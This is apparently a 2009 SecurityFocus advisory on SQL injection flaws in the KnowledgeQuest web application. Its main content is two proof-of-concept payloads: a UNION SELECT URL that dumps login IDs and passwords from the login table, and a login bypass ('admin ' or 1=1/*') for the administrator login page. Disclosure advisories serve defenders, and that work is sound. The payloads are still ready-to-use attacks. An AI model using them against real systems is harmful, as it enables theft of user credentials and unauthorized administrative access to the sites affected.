Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

MyKnowledgeQuest KnowledgeQuest Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept examples are available:

http://www.example.com/articletext.php?kqid=-999/**/union/**/select/**/1,2,3,loginid,password,6,7,8/**/from/**/login/*

In the 'administratorlogin.php' login page:
User Name:admin ' or 1=1/*
Password :[whatever]







 

Privacy Statement
Copyright 2009, SecurityFocus